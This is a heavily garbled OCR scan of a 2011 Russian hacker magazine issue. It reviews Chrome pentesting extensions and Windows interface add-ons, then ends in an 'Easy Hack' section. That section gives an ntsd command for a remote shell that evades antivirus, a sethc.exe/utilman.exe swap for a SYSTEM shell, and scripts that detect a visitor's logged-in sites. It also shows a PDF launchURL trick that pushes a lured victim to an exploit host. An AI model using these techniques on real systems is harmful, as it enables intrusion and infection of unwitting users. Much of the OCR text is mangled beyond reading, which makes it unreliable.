тов на одном и том же ресурсе возникает крайне 
часто. Чтобы не заморачиваться со входом- 
выходом, гораздо удобнее использовать аддон 
мар Му СооК!ес. По сути, это менеджер сессий. 
Для любого сайтаты можешь создать несколько 
профилей, каждый со своим набором кукисов, и 
быстро переключаться между ними. Я это делаю 
с помощью горячих клавиш. 
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П Для боод(е Свготе есть несколько расширений, которые специально заточены для поиска 
ентест Х$5-дыр, 5ОЁ-уязвимостей, а также других брешей безопасности. Пригодятся также и не- 


6 ы сколько других аддонов, которые хотя напрямую и не связаны с пентестом, но могут помочь 
|=] 
ве приложении автоматизировать некоторые из действий (вроде подстановки зловредных значений в раз- 


ные места ввода данных). 
1+ 
а 


а а ло а а с о И ГИ т еее Е ВАНЯ 


Х55 ГИег гемегае $ мые Сы 


то 

о РРР 

ма о Сиб, быба, ПыбЬ, быбе, быбы, быба, быбУ, бк 1.6, бы, ры ылныь в 
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быте, 014, бытГ, 20, ь "1. №, в. [. *, ый и] га й, 

РЕБ сти о РПГ Ра 1099 РО’ ВЫ го Е, Е т. 4. 5. в. т в. 9. г р, =, №, В. В. В. Е. Е. . 
юм. Ы, В, Р, 6, К ВТ, М, М, К, А, 
ива км, вора щУ, Вары де тра ранав _ватввнаыаы 
м, м, т. 4. К, =. 


еб еси | =. `- 
ОН у/гохч Х$5 Кау$ БН/у/а1\мМех5 


Если название покажется тебе знако- Замечательный инструмент для Нгериа Пе (ее Спготе 
мым, неудивляйся. Возможно, когда- пентестера, включающий в себя Х$5- оН.|у/09а<2| 
то ты использовал утилиту \\ебзесигиу, сканер, Х$$ реверсер, а также инспек- Нетлучшего инструмента для изучения особен- 
представляющую собой мощную среду тор объектов. Функция 5сап поможет ностей работы веб-приложения, чем Егебид Ще. К 
для тестирования безопасности веб- быстро реализовать инъекцию для сожалению, он сильно отстает от своего старшего 
приложений. Позже разработчики всех возможных местах ввода данных брата, функционал сильно урезан из-за ограни- 
реализовали функционал сканера [аддон сам их определит и предложит чений архитектуры расширений боод[е Спготе. 
в виде аддона для СПготе. Поэтому на выбор). Нужно узнать, как конкрет- Так, к примеру, Е!геБид Ще не имеет встроенного 
теперь одним кликом можно запустить ная страница отфильтровывает вывод, ]ауа5сгр{-отладчика, поэтому ты не сможешь в 
анализ сайта на наличие таких уязви- но сорцов нет? Нет проблем — просто полной мере поковыряться с ./)5-скриптами. Но 
мостей, как 50 Е п]есйоп, Сго$$-5Ке выбери опцию Кеуегзе — и вскореты аддон все равно предоставляет немало полезных 
5сприпд, Сго$$-5ЦКе Кедие{ Гогдегу, увидишь, какие из символов разреше- возможностей и, кпримеру, позволяет в реальном 
| оса/Кето{е ЕЦе |пс(иде ит.д. Все ны. Инспектор объектов позволяет в времени изменять и выполнение НТМ! -кода, 
работает в автоматическом режиме. реальном времени изменять содержи- (55$ на абсолютно любой странице. Отмечутакже 
мое функций и быстро разобраться в опцию [|пзрес(: когдаты кликаешь на нужный тебе 
логике работы веб-приложения. элемент сайта, Егебид Ще мгновенно находит в 


сорцах код, который этот элемент реализует. 


_ О Рау — @ Весога 


ри (2 Рау ор 
Е 


|ЛЛасго$ ог Спготе гой В: 
ыу/рбЕца9 Ситепе: [1 _] Мах: 


АПН Х$5 ОНу/о/6ЁКп Если тебе необходимо автоматизировать 


Это расширение пассивно ана- какую-то проверку или фаззинг, то самый и ЕОК Масго 
лизирует код просматриваемых в верный способ — создать макрос с помощью РИ 

браузере страниц и в случае обнару- этого расширения. Один раз записав сцена- Ме РгеГегепсес 
жения слабых мест, чреватых Х$5- рий и показав браузеру последовательность 

инъекцией, предупреждает об этом, действий, его можно воспроизводить сколько 

показывая соответствующий значок угодно раз на любой странице. Причем если Масго 5Еогаде: 

в адресной строке. Справедливости ты уже создавал макросы в аналогичном | 
ради, стоит упомянуть, что аддон уже аддоне, но для ЕигеТох, то их не придется соз- © ГИез ® Вооктагк$ 
довольно продолжительный период давать заново — все заработает и в Спготе. 


не обновляется. 


Апих$$5 - Версия: 1.0 
даес1роззЫе меак рот5 апа х5$ ацаск$ 
Отключить - Удалить [_) Разрешить использование в режиме инкогнито 
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Анонимность 
и безопасность 


РАС реет! РеочувиСА С [95 ВУИ 
|] р м ыяЁёН 


Гоа ег сит т 


ГРААгСНАИ 


| Сео ны 


| 


Мо5сир!$ 

оЧу/ру\/М/уу 

Этот сценарий, являющийся аналогом 
расширения Мозсг!рт для ЕигеТох, делает 
одну простую вещь — полностью отклю- 
чает выполнение скриптов на сайте. Это 
единственный гарантированный способ 
серфить зараженные сайты, откуда пач- 
ками грузятся трояны, а также защитить 
себя отХ55 и СИсКасК!пд атак :). 


`3 
ь $ 9- 2- 


Обь СорильвЕВЫя 


впегутгиоии: Росси 
и“ Негия Ргех, 


В ОГЕ ИГ с 


"ы Ре Эм И Моде 
27 Нам Вы 


СЕ Орбем 
ЦР АБоыЕ Зи 


Ргоху 5М/йсПу! 

оЧу/рМ9 У 

О назначении этого расширения понятно 
из названия. Оно позволяет определить 
в настройках прокси-серверы и быстро 
между ними переключаться. Приятно, что 
в аддоне реализована система правил: 
для обозначенных ОКЕ аддон автомати- 
чески может переключаться на нужный 
прокси-сервер. Например, для того чтобы 
пользоваться онлайн-радио Рапдога, 
которое доступно только для пользова- 
телей из Америки, мы можем установить 
соответствующий прокси из Штатов. 


> 034 


Если говорить о пентесте, нельзя не упомянуть аспекты своей собственной безопасности и 


анонимности. Берем основное: соединение через прокси [что может понадобиться и просто 


ДлЯ работы с сервисами, которые накладывают ограничения по региону пользователя}, 


работу сзащищенными версиями сайта, отключение зловредных скриптов, тщательное 


удаление историй посещений. 


[Р 


Сефа|е4 Тао 


р АЗОтЕ 11343670 
Сонилйиу" 9880 Кревйщну ине 
ВР; сопкаы саые Соеипьвисайсии, С, 
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Аррыыке лы 30 ОСТА Ша Сеск 
Срое о Ра 0 Зы а 0 


(Затприе опТу) 


О 


|Р-адрес 
оНу/п2с0СЗ 


Чтобы сразу убедиться, что прокси рабо- 


тает, есть этот полезный аддон. \\/Па{ 1$ 
гу 1р адгез5е покажеттекущий [Р-адрес, 
а также выдаст по нему полную инфор- 
мацию о провайдере, атакже геолока- 
ционную информацию, включая страну и 
примерное месторасположение. 
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‚ @ МТатрогЗспр 
@ ГИСосде Авадег Мийтайз ис 
5" Се! пем эспр... 

‚ 3 Свеск Гог изегзспр! ирдаез 

' ® Реазе сопзФег а ФопаНоп 

© Атом Татретпопкеу 


ТаппреттопкКеу 
ому/ахет 

Ты наверняка знаешь о таком инструменте, 
как Сгеазетопкеу, позволяющем изме- 
нять просматриваемые страницы налету 

с помощью специальных 5 -скриптов, 
которые инъектируется в текущую страницу. 
Татпреггплопкеу — это на 90% совместимый 
аналог для СВготе, который поддерживает 
большинство сценариев, написанных для 
СгеазетопкКеу. Модифицировать страницу, 
убрав или добавив какие-то элементы, — 
задачка для этого расширения. Большая 
база уже готовых скриптов доступна на 


сайте изегзсг!р1$.ога. 


4: 
(КВ)$ 51 Епгогсег 


м! АНА ту ТЫ ФО ИДТИ ОР ЗАКИСИ ЗА 


бота: | 


Роб Млин Блек 


КВ $5 Епюгсег 
оНу/пТУКМ/2 


Не надоеще раз объяснять, насколько 
важно использовать защищенные вер- 
сии сайтов. Многие популярные ресурсы 
сейчас поддерживают работу через 551, но 
не всегда предлагают их использовать по 
умолчанию. КВ 551 ЕпГогсег позаботится, 
чтобы ты работал именно с 55 -версией 
ресурса, если она существует. 


Сск&Сеап 
оНу/ам/АОР 


Для того чтобы стереть следы пребывания 
на каком-то ресурсе, недостаточно только 
очистить куки браузера. Есть еще немало 
мест, где легко могут остаться отметки о тво- 
ей деятельности: это Е[азп-сооК!ез, которые 
создаются на компьютере как [$0-объекты 
(Госа[ 5Вагед ОБес!$}], и куки 5ЦмегИдЁ\, и 
кэш Уауа. СИск&Сеап позаботится о том, 
чтобы полностью удалить историю просмо- 
тров и загрузок, очистить кэш и почистить 
кукисы. Учти, аддон работает только под 
виндой. 
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АКУСТИЧЕСКИЕ СИСТЕМЫ 


ЕОНЕВН С2 


Двухполосные деревянные сателлиты и мощный 6,5” сабвуфер * 
Возможность одновременного подключения 2-х источников звука 
Беспроводной пульт ДУ 

Удобное расположение органов управления на внешнем усилителе 
Система автоматической компенсации искажений — 

Еадмег |поейоепте Отзбогноп Сопго| 


" Использование внешнего усилителя обеспечивает правильную форму внутреннего объема сабвуфера 
Это положительно сказывается на качестве эвучания. 


ТЕХНОЛОГИИ ДИЗАЙН МОЩЬ КОМПАКТНОСТЬ 
52000 РОО 5/30 МРЗОО РЗ 


Ш № Капитан Улитка 


Правильные хаки 
для У\ИпО0Мс / 


+9 кудобству работы системы 


© Нет, в этой статье не пойдет речь о всяких 
украшательствах и прочих подобных глупостях, которые 
нафиг никому не нужны. Мы поговорим о правильных, 
по-настоящему полезных хаках, благодаря которым с 
системой станет работать проще и удобнее. 


Увеличить свою 
продуктивностьи 
прокачать интерфейс 
системы ты можешь 
прямо сейчас — дис- 
трибутивы всех про- 
грамм собраны для 
тебя на диске. 


Едва ли кто-то захочет поспорить, что проводник (он же МИпао\ме Ехр[огег] совсем нето 


приложение мечты, которое идеально подходит для работы ь файлами. Самое печальное, 


Надстройки 
для проводника 


что Даже еслиты используешь какой-нибудь внешний файловый менеджер, тебе все равно 
время отвремени приходится иметь дело с пресловутым проводником. Можно ли довести 
его до ума? Разумеется, но надо установить несколько надстроек. 


| 29 Сима $ Нарьяча | № Ргореся Е табватматяы |] 


ОТГТаБВаг 


НабБагмулК!4о*.сот 
То, что сразу может прибавить пять баллов кудобству использования 


проводника, — это вкладки. Это же гениально простая, но катастро- 
фически необходимая вещь, которую почему-то никак не реализует 
сама М!сгозо{К. А воту открытого проекта ОТТаБВаг, представляющего 
собой надстройку для \пдом/5 Ехрогег, есть форки — независимые 
ветки развития, которые поддерживаются разными разработчиками. 
На деле, разустановив надстройку в систему, понимаешь, что все это 
мракобесие с большим количеством окон проводникатебе и даром не 
нужно, а удобный интерфейс с вкладками — то, что нужно. 


› 036 


С урп-сопйуар 
3 ч/п2р145.ехе 
[ и 


9/2010 11:52 РМ 
3 КВ 


1719/2010 11 


| 5] ури азсвйапьзр 
Ст урп-сойй д-р 
#} орепурп-2.0.9-ди-1.0.3- па ее 
С) орепури-21 1-НълаНеке 

38 МЛгеез$ УРМ бесит. ра! 


И$Тагу 

мимим/. Изфагу.сопп 
Еще одной опцией, которой катастрофически не хватает проводнику, 
является удобный поиск. И это можно исправить с помощью [Ч$агу. 
Надстройка позволяет находить папки и файлы по принципу «Ета- 
аз-уон-{уре». В любом окне \МЛпаом/ Ехр[огег‘а появляется дополни- 
тельная панелька с полем для поиска. Теперь можно набрать часть 
названия файлов — и всписке останутся толькоте элементы, которые 
подходят под этот критерий. Или другой вариант — использовать для 
фильтрации привычные маски «*?», «*». Помимо поля для быстрого 
поиска, на этой панели есть еще несколько полезных кнопок: для бы- 
строго доступа к избранным файлам или папкам, недавним докумен- 
там, атакже ряду паг{-команд (запустить сгпд.ехе втекущей папке, 
скопировать путь до папки в буфер обмена ит.д... 
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ВЕТЕР 


а ВОТАЗЗАЗИЕЕАВВЕСИНИОВОСОНИЕИЕЕ 17 
Е | ЗНА Г В 9 а а м. 
ри АЕ ПОПЫ МЕТ] 
еее 


ТегаСору НазйТар 


мим/м/.содезеског.сот/егасору.рНр БееШебгох.ога 
Окончательно превратить проводник в человеческий файловый менеджер Последний хак в этом разделе не касается 
поможет программа ТегаСору. Если ты когда-нибудь пробовал скопиро- проводника напрямую, но прямым образом 
вать файлы обычным проводником и файловым менеджером вроде То{а[ влияет на окно со свойствами выбранного 
Соттапаег‘а, то наверняка отмечал, что через последний эта операция файла. Среди отображаемых параметров 
выполняется гораздо быстрее. Весь секрет в правильной буферизации. файла не хватает одного, но очень важного 
Подобный механизм можно реализовать в проводнике, как раз с помощью — его контрольной суммы, по которой можно 
ТегаСору. Но даже это не это главное. Куда важнее, что после установки ты проверить целостность и достоверность. Так 
получишь нормальный интерфейс для управления копированием файлов, вотлучшей из программ, которая вычисляет 
с возможностью останавливать/восстанавливать копирование данных, различные хэши для файла и при этом из- 
повторять попытки записи при обнаружении ошибок или пропускать об- ящно встраивается в стандартный интерфейс 
работку отдельных файлов. винды, является НазВТаБ. Обязательный 
пи${ Вауе! 


Одним из главных новшеств \\Лп9о\/5 7, к которому все давно уже привыкли, стала сильно прокаченная 
| рокачиваем панель задач. То, для чего раньше нужны были хаки (вроде всплывающих превьюшек для окошек}, теперь 


ар реализовано разработчиками Мисго$оН. Но это не значит, что нам нечего подправить. На самом делессть. 


\МЛпаом/$ / Тазкраг Нет Ртппег Вп5$ 

мумии. Чоог2\ИпЧо\$.сог млм. опеиртаи®е$.сот/Ьт$ 

Ты, вероятно, замечал, что в новом таскбаре можно за- Если же хочешь сразу серьезно прокачать таскбар, рекомендую 
крепить только приложения [а вернее ехе-файлы). При эту программу. После установки ты сможешь создавать на панели 
этом нельзя перенести какой-то документили скрипти задач так называемые Вт — контейнеры для группировки иконок. 
быстро обращаться к ним. Это досадное ограничение То есть можно создать раздел «Браузеры» и агад`п’агор-нутьтуда 
можно снять, если установить эту небольшую утилиту, иконки всех браузеров сразу. На панели задач отобразится иконка с 
которая позволит разместить натаскабе произвольные уменьшенными изображениями всех программ сразу, а при нажатии 
файлы, папки и букмарки браузера. появится панелька для запуска любой из них. 


ХАКЕР 09 /152/ 2011 


5иреграгМопйог Сгпай МоНйегР|у$ 


зирегБагтопКог.4е БН. 1у/71С\Уп2 

Разработчики приложений для \\Лп4о\м$ 7 получили возможность С использованием всех новомодных фишек \\пдо\м/5 7 разработана 
накладывать на иконки в панели задач индикаторы процесса. и эта замечательная программа для уведомления о новых события в 
А создатели $иреграгМопкКог решили воспользоваться этим и почтовом ящике СМай (а им пользуется вся редакция]. Помимо про- 
прямо в виде элементов панели задач реализовать элементы для смотра заголовка новых сообщений, доступны функции для быстрого 
индикации заряда батареи, использования памяти, свободного управления почтой — «перейти в [пбох», «написать новое письмо» и 
пространства на диске ит.д. Получилось очень неплохо. т.д. Все это реализовано через Литр Гы. 


Понятно, что вынести напанель задач абсолютно все программы, которые могут понадобиться, нереалЬ= 
чР НО. Да и незачем, когда есть намного более удобный инструмент для быстрого запуска приложений. Если 
Быстрый за Пуск посмотреть на количество таких «запускалок», может показаться, что за их разработку НЕ брался только 
приложении самый ленивый. Только, увы, большинство из них — полный отстой. Но не эти. 


ти. й "ТИГР 
мы 1 тЫ 


[аипспу миБаг 

мимим/.[аипсПу.пе* МИМ/М/. СПО. СОГП 

По правде говоря, удобнее способа запускать приложения, Удобная панель с иконками приложений — куда более популярный 
чем делать это с клавиатуры, для меня не существует. Я привык вариант для быстрого запуска приложений. Если хочешь наворо- 

к ро 19ВГу в Мас СХ, и мне хотелось бы и в винде открывать ченное решение, приправленное большим количеством бонусов, 
приложения через специальную консоль, вызываемой горячей попробуй пиБаг. Это гибкий и красивый десктопный бар, на которой 
клавишей. [аипсйу без всяких сомнений лучшая утилита для легко можно перетащить любые объекты, в том числе объединив их 
этих целей. Ты нажимаешь специальную комбинацию клавиш (у в группы. Если какое-то из приложений работает с файлами, то при 
меня <С {> +<брасе>], после чего появляется панель для ввода наведении наего иконк авно открытые документы. 
команды. Чаще всего достаточно набрать лишь часть названия На иконке также отоб ытий для данного при- 
приложения, и Гаипсбу сама предложит подходящий вариант для ложения: их отсле о предлагается панель 
запуска. Останется только нажать <Етщег>. [аипсВу индексирует для локального п поиска в инете. 


команды из меню «Пуск», документы, файлы проектов, папки и за- 
кладки — и все это позволяет быстро запускать с клавиатуры. Бо- 
лее того, можно дополнительно установить плагины и еще больше 
нарастить функциональность всплывающей консоли [например, 
для запуска нужной сессии в $5Н-клиенте РиТТУ по ее имени). 


ЛлитрРаа 
И(р://6н.у/рМеуВН 
В самой последней версии Мас 0$ Х Шоп появилась новая фича 

[ аипсйраа. В винде же такую опцию уже давно можно было реализо- 
вать, установив приложение /ЛитрРад, которое делаетуглы экрана 
функционально значимыми элементами. К примеру, можно сделать 
так, что при наведении курсора клевому верхнему углу, открывалось 
какое-то важное приложение. А при наведении, скажем, на правый 
угол — сворачивались все окна. Но самое главное, что в качестве 
действия может выскакивать удобная настраиваемая панель для 
запуска произвольных программ. 
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ОезКюрз 

БН. [у/ЧН76]8 

То, что может помочь, но по какой-то не- 
понятной причине напрочь отсутствует в 
системе — это виртуальные рабочие столы. 
Правда, М!сгозоЙ все же выложила на сайте 
утилиту ОезКторз (к слову, написанную самим 
Марком Руссиновичом, виднейшим специа- 
листом по внутреннему устройству МИпЧо\и®). 
ОезКюор$ поддерживает до четырех вирту- 
альных рабочих столов и предлагает пере- 
ключаться между ними при помощи горячих 
клавиш или иконки втрее. Важно, что перед 
подключением доступен предварительный 
просмотр всех рабочих столов. 


3604е$Кюр 


мумии. 36О4езКфор.сот 
Программа предлагаетеще один 


способ увеличить пространство 
рабочего стола, но вместо дис- 
кретных виртуальных экрановтут 
используется принцип вращающе- 
гося барабана. На каждой части его 
поверхности находятся свои объ- 
екты, окна, ярлычки — иты можешь 
плавно перемещаться по нему, 
имея перед глазами превьюшку 
всего, что на нем находится. Это 
может звучать дико, но на скриншо- 
те понятно, что это очень удобный 
подход. 


левой части экрана — удобнейшая штука \\Лпдо\ми$ 77, которой 

ак небольшая доработка поведения окна можетувеличить про- 
енная возможность прокачать поведение окон, есть и другие хаки. 
зачем? С ними-то лучше. 


Гепсе$ 


мии. З$агдоск.сот/ргодис*$/епсе$ 
Не могуне упомянуть очень качественную утилиту, 


которая может навести порядок на рабочем столе. Во- 
обще, если посмотреть, то пользователи разделяются 
на дватипа:те, у которых всегда идеальный порядок на 
рабочем столе, ите, укоторыхтам творится полный хаос. 
Эта прога поможет итем, и другим. Гепсез позволяет 
нанести на рабочий стол специальные области, пред- 
ставляющие собой контейнеры для ярлыков. Их можно 
какугодно перемещать по экрану или изменять размер, 
анаходящиеся в них иконки будут повторятьте же 
самые движения. В результате, все свои ярлычки можно 
разбить на категории и разместить в разных областях, 
что добавитнемало удобства. Естьу Гепсез и другая 
интересная опция: двойным кликом мыши по рабочему 
столу можно спрятать с экрана все контейнеры и иконки, 


после чего тем же движением вернуть все на место. 


ОЧЕР стола 


Какни крути, пространство рабочего стола весьма ограничено, и чтобы не зажиматься в его рамках прихо- 
дится идти на некоторые ухищрения. Идеальным Вариантом былабы установка дополнительных мониторов, 
но, если такой возможности нет, вполне можно обойтись без каких-либо дополнительных затрат. 


Ни одного 

Одно 

Два (верт.]) 

Три (осн. слева) 
Три (осн. справа) 
Четыре 


веввых 


АсегСпам$Та 
БК. [у/9г5 24а 


Эта утилита разделяет экран на две, три или четыре 
секции, куда ты можешь перенести агад & Чгор’ом 
любое окно. Это действительно полезный хак для 


ы - Ожни 


$ = 


всех владельцев больших мониторов, который раз- 
работала компания Асег. Смысл в том, что размеры 
окна автоматически подгоняются под выделенную 


область, аего месторасположение сохраняется. В 
результате окно автоматически появляется там, где 


нужно, и стеми размерами, которые тебе Нужны. 
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Е = 8-8 


р 


мийспег 

п5епиеп(. пе{ 

С помощью Эм Еспегты сможешь переключать- 
ся между окнами системы намного эффектив- 
нее. Идея втом, что ты можешь на одном экране 
увидеть все окна одновременно и быстро вы- 
брать нужное. Практически точно так же, как это 
сделано в Мас ОХ. При этом горячие клавишы, 
которые поддерживаются программой, помогут 
переключаться между окнами гораздо быстрее. 


еХ!та ВИНоп$ 

мимим/. {гаи Коп$.соп 

После установки этой тулзы, в заголовке окна 
помимо привычных трех кнопок («свернуть», 
«развернуть на весь экран», «закрыть») 
появится еще 9 дополнительных элементов, в 
том числе для придания окну эффекта прозрач- 
ности или, кпримеру, сворачивания его втрей 
(работает для любого приложения). 


› 039 


Ш м Тюрин «СгеепОод» Алексей (адггг4од@дтай. сот) 


Еазу Наск 


ЗАДАЧА: ПОДНЯТЬ СТАНДАРТНЫМИ 
СРЕДСТВАМИ УДАЛЕННЫЙ ШЕЛЛ ПОД 
МИМООМЕ. 


РЕШЕНИЕ: 


Недавно вычитал интересный способ длЯ быстрой организации шелл- 


доступа на любом порту. Задача выглядит простой, но если ограничи- 
ваться только стандартными возможностями ОС, то рабочих способов не 
такуж и много. А этот — прости лаконичен |. На машине, доступ к кото- 
рой мы хотим организовать, нужно выполнить всего лишь одну команду: 


ПЕ$А --зегуег фср:рог*=4444 са1с.ехе 


МТУО — Мисгозо В МТ Зутбойс Оебчддег, какясно из названия, вхо- 
дящий «в поставку» с ОС дебаггер. Фактически располагается онв 
%\М/паоми5%\зу${етп32. Данной командой мы запускаем п($4 на отладку 
калькулятора (са(с.ехе)}, хотя для нашей задачи подойдетлюбое другое 
приложение. Параметр -зегуегуказывает, что мы поднимаем сервер для 
удаленной отладки приложения на порту 4444 ({ср:рог=4444]. Теперь все 
готово для нашего удаленного подключения. К сожалению, обычным 
п@саГом не подключиться, потому нам потребуется ещё один п{54: 


ПЕ$5А -гетофе ср: 5егуег=192.168.138.128 ‚рог{=4444 


Здесь интуитивно понятный интерфейс и ясно, что параметром -гетоце 
указывается, что происходит подключение кудаленному серверус 
соответствующим адресом на порт 4444. Все что нам потребуется после 
подключения — это ввести следующую команду: 


Эмуляция удаленного подключения к отладчику 
с доступом к шеллу 


.5Пе11 


Готово! У нас полноценный доступ к консоли, чего мы и хотели. 

К минусам этого способа можно отнести то, что тулза п былаубрана из 
МИ пао\/5 7 и 2008. Хотя в качестве клиента ее можно бесплатно скачать с 
сайта М и установить на семерку. 

Из плюсов — решение используеттолько стандартные возможности 
\МЛпдом/< и, разумеется, не палится антивирусами. Кроме этого, пё$4 
можно запускать под обыкновенным пользователем. 


ЗАДАЧА: ПОЛУЧИТЬ ШЕЛЛ С ПРАВАМИ 
ЗУЗТЕМ, ИМЕЯ ФИЗИЧЕСКИЙ ДОСТУП К ПК. 


РЕШЕНИЕ: 


Продолжим тему тонкостей ОС \\Мп9ом/5. Пару-тройку номеров 
назад я писал про то, как можно выдрать из кэша винды учетки 


пользователей, которые в ней логинились. Способы локально- 

го повышения прав основаны на такой фиче, что в безопасном 
режиме в систему можно зайти под локальным админом, даже 
если данная учетная запись была отключена доменной политикой. 
Этот способ — рабочий. Но нетакой элегантный, как хотелось бы, 
потому что следов от захода под админом остается очень много. Что 
делать? Есть альтернативные варианты. 

1. Загружаемся с любого [иуеСЬ и монтируем файловую систему с 
виндой. Далее, если мы просто хотим стырить локальные учетки 

и кэши хэшей входов в ОС, то просто копируем файлы реестра из 
%\\Мпаом/5%\зуз{ет32\сопН9д. 

2. Если же нам хочется чего-то более интересного, то подменяем 


> ОДО 


системные файлы. Либо зе{Йс.ехе, либо ипитап.ехе. Почему их, 
спросишьты? Узнаешь позднее :]. Оба файла лежат в %\/пдом/5%\ 
5у5{ет32, подменить их можно либо на тот же сгп4.ехе, либо на 
ехе‘шник Маегргеег из М$Е, либо на что-то еще (в зависимости 
оттвоих целей). 

3. После перезагрузки компьютера мы видим экран логина. 

Далее — магия :]. Пять раз жми <5> — запустится подменен- 
ный 5е{Вс.ехе, то есть «обработчик» залипания клавиш. Нажи- 

май <\/\/п+Ц> [либо кнопочку в углу] — запустится подмененный 
ипитап.ехе, то есть «специальные возможности». 

4. В самом простом виде, если подмена была на стЧ.ехе, то перед 
тобой выскачет консоль. Еще раз уточню — это без захода в систе- 
му. Ну и самое хорошее: правау нас будут МТ АЧТНОРИТУ/5УТЕМ, то 
есть максимальные. 

5. Конечно, лучше подменять файлы на тщегргщег. С нехитрыми 
манипуляциями он будет оставаться активным при входе в систему 
пользователя, ау нас появится возможность полнофункционально- 
го удаленного доступа. 

Резюмируя вышесказанное: физический доступ к компу — это 
почти 100% МЛМ! 
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› ЧУЧ 
| ОУ Все описанные про- 


граммы со всей ру- 
брики ищи на диске. 


ЗАДАЧА: ОПРЕДЕЛИТЬ, НА КАКИХ САЙТАХ 
АВТОРИЗИРОВАН ПОЛЬЗОВАТЕЛЬ. 


РЕШЕНИЕ: 


Данный выпуск ЕазуНаск посвящен скорее всяким тонкостям и легким 
извращениям, чем конкретному, хардкорному взлому, лобовым атакам. 


Ноя считаю, что это даже интересней. Ведь конкретныеуязвимости и 
дырки ПО можно закрыть, а вотархитектурные недоработки или некор- 
ректное использование легитимного функционала поправитьтрудно. 
Но вернемся кнашей задаче. Какузнать, на каких ресурсах (бгпац, 
Тмл(ег, ГасеБоок ит.д.} авторизован пользователь? Ме Сагамие( (900. 
чиЕ!ОЗа) отыскал интересный способ. Суть проста — пользователь за- 
ходит на нашу страницу, и расположенный на ней яваскрипт делаетза- 
прос на сервер, авторизация на котором нас интересует. Запрос должен 
бытьтаким, чтобы неавторизованный пользователь видел ошибку (404, 
500 ит.д.], аавторизованный — нормальный ответ (200). По коду ответа 
и определяется состояние авторизации пользователя. 

Вариантов реализации в зависимости от ситуации было предложе- 
но два. 

Для бтпац, где загрузка и просмотр изображений возможны только 

для авторизованных пользователей, — все просто и работает на всех 
браузерах: 


<1т8 $фу1е="а15р1ау : попе; " 
оп1оад="1оёвеа_1п_фо_2та11()" 
опеггог="по* _1о58е4а_1п_%о_вта11()" 


5гс=" Ире: / /та11.50021е.сот/та11/рпофо$/1тё/рйо*о$ / 
рч611с</АТЬЕТАТАААВОСКа_И\Уа24и2\цутЕат№Мст В+ сбпуаб8акот1 
ОБЕКОб\/1М21570м7т71У)ЕЗМ202УтОУМ)А7М]Е17Т03№)Е2ОТУмА7 м5 
Ст_ММУО]и599ТвоА2тиЕтЕЙО" 

/> 


Итак, мы подгружаем скрытое изображение. Если пользователь залоги- 
нен в системе, то событие оп[оад отработает, так как изображение может 
быть подгружено браузером, и опеггог в ином случае (сервер редиректит 
на страницу логина]. Само изображение лежитна бплац. В том случае, 
если нет возможности работать с изображениями, можно попробовать 
подгрузку Вит(-страниц. 


<5сг1рф фуре="Фех*/)]ауазсг1ре" згс="ИЕЁрь : / /Е м1 ег. сот/ 

ассочп{ /изе_рИх?5е{{1п=Фа15еёатр ; Гогта{=%ех{" 
оп1оа4="по* _1о58еа_1п_Фо_%м1%ег()" 
опеггог="1о25е4_1п_Фо_%м1ег()" 
азупс="азупс" 

ро 5егЕрЕ> 


Но этот способ не будет работать с [Е и Орега, так как они могут под- 
гружать только корректные яваскрипты, то есть опхадуних не будет 
срабатывать даже при позитивном заголовке сервера. 

В чем практическая польза этого хака? Конечно, на большинстве круп- 
ных сайтов можно найти некие закутки и использовать данную методику. 
Но кроме небольшого раскрытия инфы о пользователе — пользы ника- 
кой. Хотя, если совместить этотхак с другими техниками, то возможно и 
получится что-то дельное :). 


0 ЗАДАЧА: СМЕНИТЬ БРАУЗЕР 
ПОЛЬЗОВАТЕЛЯ, ИСПОЛЬЗУЯ РОЕ. 


РЕШЕНИЕ: 


Представь следующую ситуацию. Мы затащили жертву на наш злой 
сайт, но юзер использует браузер, под которыйу нас нет сплоита — 
например, СВготе. Как заразить такого пользователя? Для данной 
ситуации есть одна интересная методика, основанная натом, что 


|Е остается браузером по умолчанию у многих пользователей, вне 
зависимости оттого, в каком браузере они проводят большую часть 
времени. Очень часто эта ситуация справедлива для корпоративных 
сетей, во многих из которых всееще стоят старые версии [Е с запре- 
том смены браузера по умолчанию. Так вот, заманив пользователя к 
нам на сайт, мы можем воспользоваться новым триком и при помощи 
специального РОЕ-файла заставить компьютер пользователя от- 
крыть любую страницу через (Е. Все что нужно сделать — это про- 
писать в РОЕ-файле следующий код: 


арр.1аипсПИВЕ ( "ПЕЁр: / /ехр1о01*-Фог-1е.сот/" гие); 
Здесь должно быть все понятно. Мы указываем Асгора{ Кеадегу 
вяваскрипте, что следует открыть новое окно по ссылке. Первый 
параметр АР|-вызова — УКЁ открываемого сайта. Второй — открыть 


в новом окне. 
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Суть атаки в том, что мы перенаправляем пользователя с хромом на 
данную РОЕ, аРОЕ, запустившись в Асгора{ Кеайеге, откроет новое 
окно с помощью браузера поумолчанию [в нашем случае |Е}. Пример 
работы этого трюка можно заценить здесь: Б\.\у/р5и Мил}. Предвос- 
хищая твои мысли, сразу уточню, что если запустить такую РОЕ'ку с 
локального диска, то появится уведомительное сообщение, которое 
спалит всю затею. 


пр, -влееыСКИИ ГВЕН Г ыы. ар. Гы =, 2] | 
сит я 


2 
пы В. Гыйт 
- ы [= || 
==. И г 


Из НгеГох через РОЕв Е 


ЗАДАЧА: 
НАУЧИТЬСЯ КРАСТЬ СЕССИИ ИЗ НТТР5. 


пене — г 


= "Ато панзчеСя тай оо СЫН |. Сов: в} Сай = ити д Пека. ть 4 ва 
РЕШЕНИЕ: „а р РОТ о й На ыы, ИЕ а еее м 
ы м агыитя й авы Вы 
Принято считать, что протокол НТТР5 — это некая всесильнаятех- ыы тель ке сталь 
рев Ва ее Абей и Е Тае == 
нология, позволяющая защитить пользователя и отфишинга (за эрнулскы и рить 
{ О р а ао Пе РОН ВО ме = 
счет проверки подписи сервера], и от перехвата трафика [за счет "аримнеси!. пьшьстсьеианск Не мал Е не --н 
использования средств шифрования]. Конечно, протокол хорош, | о ния : | ЕЕ ЫЕ 
нои всамом 55 Ге [с версии 3 — ТЕ 5}, и в его практических реали- ет 1 ье ИИ 5.1 они А 
Тена "> -— В и Гы Мы в, я 
зациях есть много проблем. Плюсесли раньше все понимали, что с [= : 
ный РА ыы | ен. ы: 
НТТР небезопасен, и были осторожны, то с доверием к НТТРЪ'у, в и и 
определенных ситуациях у злоумышленников теперь даже больше | Итати ал тыа рВр 1 п Пат, г в р ре Па 
| овен ет ПИН СТО ! ===. = ыы ВЦ. ь Ба 
шансов на успех, чем было раньше. В прошлом номерея писал | о. А лы Перти я 
р в _ыеч ры Жо - ый Боро Г ЗЫ выван. ВЫ 1 ан 
